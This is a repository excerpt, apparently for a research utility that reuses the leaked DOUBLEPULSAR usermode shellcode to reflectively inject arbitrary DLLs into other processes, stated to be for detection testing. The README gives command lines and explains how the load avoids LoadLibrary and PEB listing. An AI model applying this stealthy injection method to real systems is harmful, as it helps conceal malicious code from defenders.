154 | </Project>


--------------------------------------------------------------------------------
/DOUBLEPULSAR-usermode-injector/DOUBLEPULSAR-usermode-injector.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="DOUBLEPULSAR-usermode-injector.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <None Include="..\dopu-64bit-usermode-shellcode.bin">
24 |       <Filter>Resource Files</Filter>
25 |     </None>
26 |   </ItemGroup>
27 | </Project>


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2017, Countercept (https://countercept.com)
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | * Neither the name of the copyright holder nor the names of its
17 |   contributors may be used to endorse or promote products derived from
18 |   this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | Author: Matt Hillman (matt.hillman@countercept.com - @sp1nl0ck)
 2 | 
 3 | Company: Countercept (@countercept)
 4 | 
 5 | Website: https://countercept.com
 6 | 
 7 | 
 8 | A utility to use the usermode shellcode from the DOUBLEPULSAR payload to reflectively load an arbitrary DLL into another process, for use in testing detection techniques or other security research.
 9 | 
10 | 
11 | ## Background
12 | 
13 | The DOUBLEPULSAR payload released by Shadow Brokers initially runs in kernel mode and reflectively loads a DLL into a usermode process using an Asynchronous Procedure Call (APC). The actual loading of the DLL occurs in usermode, and this utility makes use of that usermode shellcode to load a DLL in a specified process and execute a given ordinal. This is to help with testing attack detection and digital forensic incident response techniques against the payload.
14 | 
15 | The loader is of interest as it works with any arbitrary DLL without making use of the standard LoadLibrary call. Avoiding LoadLibrary can make the load more stealthy as it avoids the need to write the DLL to disk, can avoid anything monitoring LoadLibrary calls, and can also avoid having an entry in the Process Environment Block (PEB), which is usually how a list of loaded modules is obtained. Such techniques are now fairly common place, but up to now we were not aware of any public code that could load an arbitrary DLL in this way - existing code requires the DLL to be custom built to support being loaded. DOUBLEPULSAR is different in that it implements a more complete loader that can load almost any DLL. This loader works on almost any version of Windows as-is.
16 | 
17 | While DOUBLEPULSAR itself uses an APC call from kernel mode queued against a usermode process, this utility queues the APC from usermode; this makes little practical difference. Additionally, this utility can trigger the shellcode using CreateRemoteThread instead.
18 | 
19 | 
20 | ## Usage
21 | ```
22 | C:\>DOUBLEPULSAR-usermode-injector.exe
23 | USAGE: <pid> <shellcode_file> <dll_to_inject> <ordinal_to_execute> [use_CreateRemoteProcess]
24 | 
25 | The last argument is optional, if specified 'true' then CreateRemoteProcess will be used instead of using an APC 
26 | call which is the default way Doublepulsar works. This is to allow people to test it out in different ways.
27 | The default is using APC. This will inject into ALL threads in the target, which makes it more likely one of them 
28 | will trigger quickly. This is only suitable for testing as it may be undesirable to call the payload more than 
29 | once.
30 | ```
31 | 
32 | For example, inject `somelibrary.dll` into process `1234` using an Asynchronous Procedure Call (APC) and call ordinal `1`:
33 | ```
34 | C:\>dopu-usermode-injector.exe 1234 dopu-64bit-usermode-shellcode.bin somelibrary.dll 1
35 | Using thread: 2456
36 | Using thread: 2032
37 | Using thread: 3876
38 | ```
39 | 
40 | Or as above, but using CreateRemoteThread instead of APC:
41 | ```
42 | C:\>dopu-usermode-injector.exe 1234 dopu-64bit-usermode-shellcode.bin somelibrary.dll 1 true
43 | ```
44 | 
45 | ## More information 
46 | 
47 | A full analysis of the usermode shellcode of DOUBLEPULSAR:
48 | 
49 | https://www.countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/
50 | 
51 | Prior work on the kernel component of DOUBLEPULSAR:
52 | 
53 | https://www.countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/
54 | 
55 | https://zerosum0x0.blogspot.co.uk/2017/04/doublepulsar-initial-smb-backdoor-ring.html
56 | 


--------------------------------------------------------------------------------
/dopu-64bit-usermode-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WithSecureLabs/doublepulsar-usermode-injector/711e16f510e3c8b56ad729f76f943f96397fa285/dopu-64bit-usermode-shellcode.bin


--------------------------------------------------------------------------------